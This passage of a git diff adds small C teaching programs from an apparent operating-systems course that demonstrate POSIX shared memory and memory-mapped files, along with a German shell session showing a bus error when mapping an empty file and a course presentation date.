+++ b/20230619/shm-1a.c
@@ -0,0 +1,10 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+int main (void)
+{
+ int shm = shm_open ("test", O_RDWR, 0666);
+ write (shm, "Hello, world!", 13);
+ return 0;
+}
diff --git a/20230619/shm-1b.c b/20230619/shm-1b.c
new file mode 100644
index 0000000000000000000000000000000000000000..191ec9a0a4b35b8a2ff1af7e10eb3ae4d354b135
--- /dev/null
+++ b/20230619/shm-1b.c
@@ -0,0 +1,20 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <error.h>
+
+int main (void)
+{
+ char buffer[42];
+ int shm = shm_open ("test", O_RDONLY, 0444);
+ printf ("shm = %d\n", shm);
+ int ret = read (shm, buffer, 42);
+ if (ret >= 0)
+ printf ("%d bytes read\n", ret);
+ else
+ error (errno, errno, "cannot read shm");
+ printf ("%s\n", buffer);
+ return 0;
+}
diff --git a/20230619/shm-1c.c b/20230619/shm-1c.c
new file mode 100644
index 0000000000000000000000000000000000000000..ff6363eddfa2b6d26ae5c390f96306702afd60f8
--- /dev/null
+++ b/20230619/shm-1c.c
@@ -0,0 +1,14 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main (void)
+{
+ char buffer[42];
+ int shm = shm_open ("test", O_RDONLY, 0444);
+ lseek (shm, 0, SEEK_SET);
+ read (shm, buffer, 42);
+ printf ("%s\n", buffer);
+ return 0;
+}
diff --git a/20230619/shm-1d.c b/20230619/shm-1d.c
new file mode 100644
index 0000000000000000000000000000000000000000..fca489991c719d422a6b0f8102f6b97cdbd8fc6d
--- /dev/null
+++ b/20230619/shm-1d.c
@@ -0,0 +1,9 @@
+#include <fcntl.h>
+#include <unistd.h>
+
+int main (void)
+{
+ int f = open ("test", O_RDWR, 0666);
+ write (f, "Hello, world!", 13);
+ return 0;
+}
diff --git a/20230619/shm-1e.c b/20230619/shm-1e.c
new file mode 100644
index 0000000000000000000000000000000000000000..ba73cda441daa5e6f177d73f499cbd6d05c3f875
--- /dev/null
+++ b/20230619/shm-1e.c
@@ -0,0 +1,19 @@
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <error.h>
+
+int main (void)
+{
+ char buffer[42];
+ int f = open ("test", O_RDONLY, 0444);
+ printf ("f = %d\n", f);
+ int ret = read (f, buffer, 42);
+ if (ret >= 0)
+ printf ("%d bytes read\n", ret);
+ else
+ error (errno, errno, "cannot read shm");
+ printf ("%s\n", buffer);
+ return 0;
+}
diff --git a/20230619/shm-1f.c b/20230619/shm-1f.c
new file mode 100644
index 0000000000000000000000000000000000000000..ce519110002c2a1a8732d3aad6f0ba779dd75d48
--- /dev/null
+++ b/20230619/shm-1f.c
@@ -0,0 +1,10 @@
+#include <fcntl.h>
+#include <unistd.h>
+
+int main (void)
+{
+ int f = open ("test", O_RDWR, 0666);
+ write (f, "Hello, world!", 13);
+ fsync (f);
+ return 0;
+}
diff --git a/20230619/shm-2a.c b/20230619/shm-2a.c
new file mode 100644
index 0000000000000000000000000000000000000000..8853ecaed14074e136a764fbdb868d5fe7a4baf3
--- /dev/null
+++ b/20230619/shm-2a.c
@@ -0,0 +1,11 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+int main (void)
+{
+ int shm = shm_open ("test", O_CREAT | O_RDWR, 0666);
+ write (shm, "Hello, world!", 14);
+ close (shm);
+ return 0;
+}
diff --git a/20230619/shm-2b.c b/20230619/shm-2b.c
new file mode 100644
index 0000000000000000000000000000000000000000..92ef091a9f00a93ed834071bd425b5b60238c3ee
--- /dev/null
+++ b/20230619/shm-2b.c
@@ -0,0 +1,14 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main (void)
+{
+ char buffer[42];
+ int shm = shm_open ("test", O_RDONLY, 0444);
+ read (shm, buffer, 42);
+ close (shm);
+ printf ("%s\n", buffer);
+ return 0;
+}
diff --git a/20230619/shm-3a.c b/20230619/shm-3a.c
new file mode 100644
index 0000000000000000000000000000000000000000..b5273ec483618b33585ff78f70f419bdff149950
--- /dev/null
+++ b/20230619/shm-3a.c
@@ -0,0 +1,14 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main (void)
+{
+ int file = open ("test.txt", O_CREAT | O_RDWR, 0666);
+ printf ("file = %d\n", file);
+ lseek (file, 0, SEEK_SET);
+ write (file, "Hello, world!", 14);
+ close (file);
+ return 0;
+}
diff --git a/20230619/shm-3b.c b/20230619/shm-3b.c
new file mode 100644
index 0000000000000000000000000000000000000000..21f2d5d32d075a33bd94abeb9b69495d58b8c8a5
--- /dev/null
+++ b/20230619/shm-3b.c
@@ -0,0 +1,15 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main (void)
+{
+ char buffer[42];
+ int file = open ("test.txt", O_RDONLY, 0444);
+ lseek (file, 0, SEEK_SET);
+ read (file, buffer, 42);
+ close (file);
+ printf ("%s\n", buffer);
+ return 0;
+}
diff --git a/20230619/shm-4a.c b/20230619/shm-4a.c
new file mode 100644
index 0000000000000000000000000000000000000000..00ddb6790a669f3040dd7439c98c30d01227662d
--- /dev/null
+++ b/20230619/shm-4a.c
@@ -0,0 +1,14 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <string.h>
+
+int main (void)
+{
+ int shm = shm_open ("test", O_CREAT | O_RDWR, 0666);
+ char *buffer = mmap (NULL, 42, PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
+ strcpy (buffer, "Hello, world!");
+ munmap (buffer, 42);
+ close (shm);
+ return 0;
+}
diff --git a/20230619/shm-4b.c b/20230619/shm-4b.c
new file mode 100644
index 0000000000000000000000000000000000000000..34c4b6ae3bebb451979307c61f3cfe66c5477f87
--- /dev/null
+++ b/20230619/shm-4b.c
@@ -0,0 +1,14 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main (void)
+{
+ int shm = shm_open ("test", O_RDONLY, 0444);
+ char *buffer = mmap (NULL, 42, PROT_READ, MAP_SHARED, shm, 0);
+ printf ("%s\n", buffer);
+ munmap (buffer, 42);
+ close (shm);
+ return 0;
+}
diff --git a/20230619/shm-4c.c b/20230619/shm-4c.c
new file mode 100644
index 0000000000000000000000000000000000000000..6e2bdeca2e201387279fad47dd8e5c38fd9b45e0
--- /dev/null
+++ b/20230619/shm-4c.c
@@ -0,0 +1,18 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+
+int main (void)
+{
+ int shm = shm_open ("test", O_CREAT | O_RDWR, 0666);
+ char *buffer = mmap (NULL, 42, PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
+ printf ("buffer = %016zx\n", (size_t) buffer);
+ strcpy (buffer, "Hallo, Welt!");
+ char dummy[42];
+ fgets (dummy, 42, stdin);
+ munmap (buffer, 42);
+ close (shm);
+ return 0;
+}
diff --git a/20230619/shm-4d.c b/20230619/shm-4d.c
new file mode 100644
index 0000000000000000000000000000000000000000..f6bdad6a0acc4392d0ecbd13d31f105bf756e618
--- /dev/null
+++ b/20230619/shm-4d.c
@@ -0,0 +1,18 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdio.h>
+
+int main (void)
+{
+ int shm = shm_open ("test", O_RDONLY, 0444);
+ char *buffer = mmap (NULL, 42, PROT_READ, MAP_SHARED, shm, 0);
+ printf ("buffer = %016zx\n", (size_t) buffer);
+ printf ("%s\n", buffer);
+ char dummy[42];
+ fgets (dummy, 42, stdin);
+ munmap (buffer, 42);
+ close (shm);
+ return 0;
+}
diff --git a/20230619/shm-4e.c b/20230619/shm-4e.c
new file mode 100644
index 0000000000000000000000000000000000000000..e04cb042ea730ecb2b1a50b251a608af20a87934
--- /dev/null
+++ b/20230619/shm-4e.c
@@ -0,0 +1,18 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+
+int main (void)
+{
+ int file = open ("test.txt", O_CREAT | O_RDWR, 0666);
+ char *buffer = mmap (NULL, 42, PROT_READ | PROT_WRITE, MAP_SHARED, file, 0);
+ printf ("buffer = %016zx\n", (size_t) buffer);
+ strcpy (buffer, "Hello, world!");
+ char dummy[42];
+ fgets (dummy, 42, stdin);
+ munmap (buffer, 42);
+ close (file);
+ return 0;
+}
diff --git a/20230619/shm-4e.txt b/20230619/shm-4e.txt
new file mode 100644
index 0000000000000000000000000000000000000000..aac57f2a2bae0a4369707abe7b8c0c241fe44b36
--- /dev/null
+++ b/20230619/shm-4e.txt
@@ -0,0 +1,38 @@
+cassini/home/peter/bo/2023ss/bs/20230619> ./shm-4e
+buffer = 00007f7aeeabe000
+Bus-Zugriffsfehler
+cassini/home/peter/bo/2023ss/bs/20230619> cat shm-4e.c
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+
+int main (void)
+{
+ int file = open ("test.txt", O_CREAT | O_RDWR, 0666);
+ char *buffer = mmap (NULL, 42, PROT_READ | PROT_WRITE, MAP_SHARED, file, 0);
+ printf ("buffer = %016zx\n", (size_t) buffer);
+ strcpy (buffer, "Hello, world!");
+ char dummy[42];
+ fgets (dummy, 42, stdin);
+ munmap (buffer, 42);
+ close (file);
+ return 0;
+}
+cassini/home/peter/bo/2023ss/bs/20230619> touch test.txt
+cassini/home/peter/bo/2023ss/bs/20230619> ./shm-4e
+buffer = 00007f0e01d7c000
+Bus-Zugriffsfehler
+cassini/home/peter/bo/2023ss/bs/20230619> echo "Irgendwas? Was soll ich denn schreiben, was länger als 42 Bytes ist?" > test.txt
+cassini/home/peter/bo/2023ss/bs/20230619> ./shm-4e
+buffer = 00007f47a8a23000
+
+cassini/home/peter/bo/2023ss/bs/20230619> cat test.txt
+Hello, world! soll ich denn schreiben, was länger als 42 Bytes ist?
+cassini/home/peter/bo/2023ss/bs/20230619> echo "Hello?" > test.txt
+cassini/home/peter/bo/2023ss/bs/20230619> ./shm-4e
+buffer = 00007f1ad11ff000
+
+cassini/home/peter/bo/2023ss/bs/20230619> cat test.txt
+Hello, cassini/home/peter/bo/2023ss/bs/20230619>
diff --git a/20230619/shm-4f.c b/20230619/shm-4f.c
new file mode 100644
index 0000000000000000000000000000000000000000..f6bdad6a0acc4392d0ecbd13d31f105bf756e618
--- /dev/null
+++ b/20230619/shm-4f.c
@@ -0,0 +1,18 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdio.h>
+
+int main (void)
+{
+ int shm = shm_open ("test", O_RDONLY, 0444);
+ char *buffer = mmap (NULL, 42, PROT_READ, MAP_SHARED, shm, 0);
+ printf ("buffer = %016zx\n", (size_t) buffer);
+ printf ("%s\n", buffer);
+ char dummy[42];
+ fgets (dummy, 42, stdin);
+ munmap (buffer, 42);
+ close (shm);
+ return 0;
+}
diff --git a/20230619/shm-5a.c b/20230619/shm-5a.c
new file mode 100644
index 0000000000000000000000000000000000000000..8acc3dde82d8d7f7c4fd77714a3f5f65b7aa2b96
--- /dev/null
+++ b/20230619/shm-5a.c
@@ -0,0 +1,14 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <string.h>
+
+int main (void)
+{
+ int file = open ("test.txt", O_CREAT | O_RDWR, 0666);
+ char *buffer = mmap (NULL, 42, PROT_READ | PROT_WRITE, MAP_SHARED, file, 0);
+ strcpy (buffer, "Hello, world!");
+ munmap (buffer, 42);
+ close (file);
+ return 0;
+}
diff --git a/20230619/shm-5b.c b/20230619/shm-5b.c
new file mode 100644
index 0000000000000000000000000000000000000000..c31ba9b27a39f587474632b0442cbc33d20206eb
--- /dev/null
+++ b/20230619/shm-5b.c
@@ -0,0 +1,14 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main (void)
+{
+ int file = open ("test.txt", O_RDONLY, 0444);
+ char *buffer = mmap (NULL, 42, PROT_READ, MAP_SHARED, file, 0);
+ printf ("%s\n", buffer);
+ munmap (buffer, 42);
+ close (file);
+ return 0;
+}
diff --git a/20230619/shm-6a.c b/20230619/shm-6a.c
new file mode 100644
index 0000000000000000000000000000000000000000..45e883c1f746de42bf8b2cfc0bcebb61e9c862e2
--- /dev/null
+++ b/20230619/shm-6a.c
@@ -0,0 +1,19 @@
+#include <stdio.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <string.h>
+
+int main (void)
+{
+ int file = open ("test.txt", O_CREAT | O_RDWR, 0666);
+ fprintf (stderr, "0\n");
+ char *buffer = mmap (NULL, 42, PROT_READ | PROT_WRITE, MAP_SHARED, file, 0);
+ fprintf (stderr, "1\n");
+ strcpy (buffer, "Hello, world!");
+ fprintf (stderr, "2\n");
+ munmap (buffer, 42);
+ fprintf (stderr, "3\n");
+ close (file);
+ return 0;
+}
diff --git a/20230619/shm-6c.c b/20230619/shm-6c.c
new file mode 100644
index 0000000000000000000000000000000000000000..c4c537612a4d24d1b7bf20bb8c3f53a30c0a3322
--- /dev/null
+++ b/20230619/shm-6c.c
@@ -0,0 +1,19 @@
+#include <stdio.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <string.h>
+
+int main (void)
+{
+ int file = open ("test.txt", O_CREAT | O_RDWR, 0666);
+ fprintf (stderr, "0\n");
+ char *buffer = mmap (NULL, 42, PROT_READ | PROT_WRITE, MAP_SHARED, file, 0);
+ fprintf (stderr, "1\n");
+ strcpy (buffer, "Dies ist ein weiterer Test.");
+ fprintf (stderr, "2\n");
+ munmap (buffer, 42);
+ fprintf (stderr, "3\n");
+ close (file);
+ return 0;
+}
diff --git a/20230619/shm-7a.c b/20230619/shm-7a.c
new file mode 100644
index 0000000000000000000000000000000000000000..4641337ca7d979440d493311193e618d713f1f27
--- /dev/null
+++ b/20230619/shm-7a.c
@@ -0,0 +1,16 @@
+#include <stdio.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <string.h>
+
+int main (void)
+{
+ int shm = shm_open ("test", O_CREAT | O_RDWR, 0666);
+ char *buffer = mmap (NULL, 42, PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
+ printf ("%016zx\n", buffer);
+ strcpy (buffer, "Hello, world!");
+ munmap (buffer, 42);
+ close (shm);
+ return 0;
+}
diff --git a/20230619/shm-7b.c b/20230619/shm-7b.c
new file mode 100644
index 0000000000000000000000000000000000000000..e39d524762cc641d3c019cc16a7193424b3bca43
--- /dev/null
+++ b/20230619/shm-7b.c
@@ -0,0 +1,15 @@
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main (void)
+{
+ int shm = shm_open ("test", O_RDONLY, 0444);
+ char *buffer = mmap (NULL, 42, PROT_READ, MAP_SHARED, shm, 0);
+ printf ("%016zx\n", buffer);
+ printf ("%s\n", buffer);
+ munmap (buffer, 42);
+ close (shm);
+ return 0;
+}
diff --git a/20230619/shm-8.c b/20230619/shm-8.c
new file mode 100644
index 0000000000000000000000000000000000000000..f2397311753bbcdc9e747804c3c0ccf04087533f
--- /dev/null
+++ b/20230619/shm-8.c
@@ -0,0 +1,7 @@
+#include <sys/mman.h>
+
+int main (void)
+{
+ shm_unlink ("test");
+ return 0;
+}
diff --git a/20230619/test.txt b/20230619/test.txt
new file mode 100644
index 0000000000000000000000000000000000000000..444ac3651a1f8b020863d838b9f9e593f21d0dc4
--- /dev/null
+++ b/20230619/test.txt
@@ -0,0 +1 @@
+Hello,
\ No newline at end of file
diff --git a/termine.txt b/termine.txt
new file mode 100644
index 0000000000000000000000000000000000000000..08a8cee90e682c897c3db73e002f897e33f5ff2b
--- /dev/null
+++ b/termine.txt
@@ -0,0 +1 @@
+Präsentationen: 21.9.2023, 14:00 Uhr